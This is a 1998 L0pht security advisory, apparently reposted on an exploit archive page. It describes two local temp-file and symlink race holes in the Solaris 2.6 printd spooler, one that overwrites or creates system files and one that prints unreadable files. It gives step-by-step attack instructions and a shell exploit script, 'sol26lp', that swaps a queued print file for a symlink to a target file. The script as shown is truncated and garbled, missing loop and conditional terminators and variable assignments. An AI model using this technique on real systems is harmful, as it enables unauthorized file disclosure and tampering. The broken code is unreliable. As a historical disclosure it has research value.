Solaris 2.6 printd tmpfile problem

Description:Standard insecure tmpfile hole
Author:Silicosis <>
Compromise:unprivileged users can overwrite and create system files and print files they shouldn't be able to read.
Vulnerable Systems:Solaris 2.6
Date:11 March 1998

Date: Wed, 11 Mar 1998 11:23:44 -0600
From: Aleph One <>
Subject: Solaris printd security vulnerability

                        L0pht Security Advisory

      Document:  L0pht Security Advisory
    URL Origin:
  Release Date:  February 23, 1998
   Application:  printd (lp)
 Operating Sys:  Solaris 2.6
      Severity:  Users can overwrite/create system files
                 Users can print unreadable files
        Author:  silicosis <>
  Patch Status:  Sun has been made aware of the vulnerabilities
                 3 weeks ago and still has not released a patch.


Create/Overwrite Files:

Sun hasn't learned from it's past mistakes; temp files are still a
problem this time it's with  'printd' (lp).   Upon printing a large file
that sits in the queue for ~1minute, a lock file (/tmp/.printd.lock) is
created.  Before you print something large, create a symlink pointing to
the /tmp/.printd.lock towards something you'd like to create/overwrite.

When printd is done, the file your pointing to will have mode 640, and
the contents will contain printd's pid.


Printing unreadable files:

Sun has restructured their print spooling in Solaris 2.6. They've
gone over to a queueing system that's similar to sendmail:

[~]lp .tcshrc
[~]ls -al /var/spool/print
total 12
drwxr-xr-x   2 root     lp           512 Feb 20 12:44 .
drwxrwxr-x  10 root     bin          512 Feb 17 11:28 ..
-rw-rw-r--   1 root     staff          4 Feb 20 12:44 .seq
-rw-r-----   1 root     staff         80 Feb 20 12:44 cfA037core
lrwxrwxrwx   1 root     staff         19 Feb 20 12:44 dfA037core ->
-rw-r-----   1 root     staff         23 Feb 20 12:44 xfA037core

You have your control, transfer and datafiles. The datafile is just
a symlink to the file you printed, so if you link the file you printed
to something else *before* the queue is flushed, printd will print it.

A simple exploit script:

----[CUT HERE: sol26lp]----

#Print unreadable files on solaris2.6
# --If it didn't work, change $BIGFILE to
#   something bigger.
# --Script usually works 80% of the time..
#   Didn't work? Try again.. Throw something
#   at the printspooler to slow it down.


if [ $# != 1 ]; then
        echo "Usage:"
        echo "./sol26lp <file>"
        echo "Print unreadable files on Solaris2.6"
        echo "        "
       exit 1

echo "Need a large file to print, using $BIGFILE."
cp /usr/bin/vi $TMPFILE ; chmod 700 $TMPFILE
#sleep 1;

rm $TMPFILE ; ln -s $1 $TMPFILE

QF=`ls -al /var/spool/print |grep $TMPFILE |awk '{print $9}'`

echo "Queue File: /var/spool/print/$QF"

while [ -h /var/spool/print/$QF ]; do
        echo "Waiting for file to print";
        sleep 1;

echo "File printed. Erasing temp files."

echo "Done."
echo " 1/20/98"

----[CUT HERE: sol26lp]----

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: